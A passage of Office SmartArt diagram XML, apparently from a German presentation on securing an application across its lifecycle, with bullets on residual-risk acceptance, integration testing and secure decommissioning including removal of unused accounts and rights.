        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B41BA46C-2BF8-4009-952A-030617C1F20E}" type="sibTrans" cxnId="{F162FF80-E526-4DF1-804E-5C3BF900F9BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15A86FD2-C6CA-4F8F-9866-EF07BBA8DCBF}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-DE" sz="900" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Stellen Sie sicher, dass der Anwendungseigentümer Restrisiken akzeptiert oder zusätzliches Budget bereitstellt.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F0A84F08-42FB-4D4F-9F05-B090AEE4BBCF}" type="parTrans" cxnId="{2594D5AA-3188-4C43-AC87-6FEDFBC0CF61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A881A67-E081-442D-88F0-7F19934B2424}" type="sibTrans" cxnId="{2594D5AA-3188-4C43-AC87-6FEDFBC0CF61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BAC6373-F9EB-41A4-8ED5-5AC4BE881957}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000" bIns="90000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pP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Testen Sie die technischen Funktionen und die Integration in die IT-Architektur, koordinieren Sie fachliche Tests.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C690A9C-5A8A-417A-B88B-6B87A5EF7287}" type="parTrans" cxnId="{14CA882F-A6BC-4F88-9362-3A026C752696}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85C2185F-69A3-4A44-AA29-8AFED7A8B4C6}" type="sibTrans" cxnId="{14CA882F-A6BC-4F88-9362-3A026C752696}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8227CF42-37DB-48F7-918E-13D3D47C538B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="18000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pP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Nehmen Sie die Anwendung auf sichere Weise außer Betrieb, inkl. dem Löschen von nicht mehr benötigten Benutzerkonten, Rollen und Rechten.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A20626D2-A5F1-4A70-8714-28DAD0220E9B}" type="parTrans" cxnId="{CD623408-7E8E-4F86-B944-604DE9117F39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCEF49C3-DF27-493D-92A0-21D07EC7C400}" type="sibTrans" cxnId="{CD623408-7E8E-4F86-B944-604DE9117F39}">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custScaleY="82622">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6" custScaleX="123722" custScaleY="98000">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custScaleY="98507">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6" custScaleX="123722" custScaleY="121179">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custScaleY="98610">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6" custScaleX="123722" custScaleY="122067">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custScaleY="120963">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="143150">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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custScaleY="101258">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="111568">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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custScaleY="62093">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="62093">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F86A1B00-F085-4262-A83F-942A35CB5C83}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{CD623408-7E8E-4F86-B944-604DE9117F39}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{8227CF42-37DB-48F7-918E-13D3D47C538B}" srcOrd="1" destOrd="0" parTransId="{A20626D2-A5F1-4A70-8714-28DAD0220E9B}" sibTransId="{FCEF49C3-DF27-493D-92A0-21D07EC7C400}"/>
    <dgm:cxn modelId="{E33C150D-5FB8-4205-971C-B13BFB192B62}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3F1B6A13-997C-4261-80FC-7864F5DA1671}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{630BF613-79F8-428F-8964-E241E474DFB8}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" srcOrd="0" destOrd="0" parTransId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" sibTransId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{49821016-59B2-49A9-8B65-5A27F6D118C2}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="2" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{F9D37816-9308-48AB-977B-6A809CBC6EC7}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B10FCB1E-EBC8-49C0-BA1F-4478BED62C82}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B98CA423-6056-48A5-8715-E2F822D9E61B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="3" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{71CD7C2A-0674-4984-96D3-7426B32CE2A3}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{14CA882F-A6BC-4F88-9362-3A026C752696}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{6BAC6373-F9EB-41A4-8ED5-5AC4BE881957}" srcOrd="1" destOrd="0" parTransId="{1C690A9C-5A8A-417A-B88B-6B87A5EF7287}" sibTransId="{85C2185F-69A3-4A44-AA29-8AFED7A8B4C6}"/>
    <dgm:cxn modelId="{2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="3" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{90274A3C-BE97-4019-B9D2-D51A56CF3FC9}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" srcOrd="5" destOrd="0" parTransId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" sibTransId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}"/>
    <dgm:cxn modelId="{9490A33E-150F-43FA-8C82-FC5775704428}" type="presOf" srcId="{0911EE0D-9D23-40C7-A4EF-7824DDE63B38}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7789AD3F-3F80-48B4-8CBF-6A44DCA1A74B}" type="presOf" srcId="{6BAC6373-F9EB-41A4-8ED5-5AC4BE881957}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{CB3CFF43-82BC-4CA2-B4DB-8DB7FB5D5A9D}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" srcOrd="0" destOrd="0" parTransId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" sibTransId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}"/>
    <dgm:cxn modelId="{E282666B-4896-43A2-B130-B389327C27A4}" type="presOf" srcId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FB1D8650-CBFD-4B0D-8EE0-3720E2B54B58}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE369573-7275-4190-A508-8493472AD3CB}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="1" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{260BB175-6E77-4A03-B732-0E1C1DE8918B}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B0862C5A-14E3-4294-B1FE-62BDAC9373A8}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{97FCDD5A-82BF-4D3A-9D7F-1E12260B100A}" type="presOf" srcId="{15A86FD2-C6CA-4F8F-9866-EF07BBA8DCBF}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="5" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{FD4CE680-C9E1-4A89-B871-5BA641D7F371}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F162FF80-E526-4DF1-804E-5C3BF900F9BA}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{2E228679-E9E3-4F91-B4E1-32048CD950E7}" srcOrd="3" destOrd="0" parTransId="{F582F79B-F217-477B-85D0-6A0F5AE522FE}" sibTransId="{B41BA46C-2BF8-4009-952A-030617C1F20E}"/>
    <dgm:cxn modelId="{F8680782-4EDE-4068-B404-1D73F5DE072E}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C048991-4CC6-48F3-85DE-06094639B4B0}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="1" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{5D33F991-CD13-4498-BC72-1ADEA9D42C2E}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{97452B92-22D7-4E80-B74D-5D72DE542765}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="2" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{1933A096-1646-4887-B6C7-5E83CC8053EC}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1"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552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{953325A0-207E-4AE6-A6DC-14B69025B19F}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
    <dgm:cxn modelId="{2DA739A5-3BB9-441E-9C67-247DCC9F4184}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C4951A7-C547-4AFE-A083-ACC54C9F2B96}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{34810BA8-ABE6-4135-9DA7-66092273C67F}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{2594D5AA-3188-4C43-AC87-6FEDFBC0CF61}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{15A86FD2-C6CA-4F8F-9866-EF07BBA8DCBF}" srcOrd="2" destOrd="0" parTransId="{F0A84F08-42FB-4D4F-9F05-B090AEE4BBCF}" sibTransId="{6A881A67-E081-442D-88F0-7F19934B2424}"/>
    <dgm:cxn modelId="{3008BFAB-7906-48AD-AA6B-3D83BFB64B8B}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48311AAE-790D-405B-BEB3-7AB59042F49A}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" srcOrd="4" destOrd="0" parTransId="{899E3CF7-9D0C-4165-A610-81A1077E783C}" sibTransId="{9AA1C047-7E86-43E3-AA24-C92B3BC7E34B}"/>
    <dgm:cxn modelId="{4AA639C6-6066-4FA9-8BCD-5DD41FAE928F}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{737CA7C6-50FC-44B5-8389-0CEB00D8B5A2}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{0911EE0D-9D23-40C7-A4EF-7824DDE63B38}" srcOrd="2" destOrd="0" parTransId="{37B94FDF-0D56-42E3-B8BF-6214133CEEAC}" sibTransId="{9ED848A5-3C72-4252-8B24-F6C5E758426A}"/>
    <dgm:cxn modelId="{DE5646CC-F144-493B-9414-C6346E590FF4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}"/>
    <dgm:cxn modelId="{E65C80CE-FCC9-463F-84F6-B5B083BC8F53}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0"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73ED36D5-AC0C-474F-A1AF-1E4F3634F040}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B5A14ED5-DB89-4CE7-862F-89CE179CF25D}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1D4936DB-A27F-42A6-A70D-6FED0E37D8B2}" type="presOf" srcId="{8227CF42-37DB-48F7-918E-13D3D47C538B}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1"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5C2BBAEF-F05E-4861-ABB4-A7E89A9693B0}" type="presOf" srcId="{2E228679-E9E3-4F91-B4E1-32048CD950E7}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="2" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{9D4757F6-2C0F-4C16-AB10-984C183C28F6}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F74002FD-537F-49CF-8FDC-1B60540AC8C3}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{44036FFE-0AC2-47E1-8E4F-1EF89024A280}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" srcOrd="0" destOrd="0" parTransId="{CEDD41B6-F9E9-4738-8190-4FA86636363D}" sibTransId="{F38BA272-2C4D-4E72-B1E6-C51DCA074847}"/>
    <dgm:cxn modelId="{4F5DDDFE-7D85-43FD-8234-8C5C0A5C31DA}" type="presOf" srcId="{C7D43052-0DE3-42CE-8D15-E3EB141D163C}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C358952D-73E6-4B99-ADAC-8BC39FB106C2}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6A79A1C2-26E2-4615-9AC8-E6AF03AC01B1}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
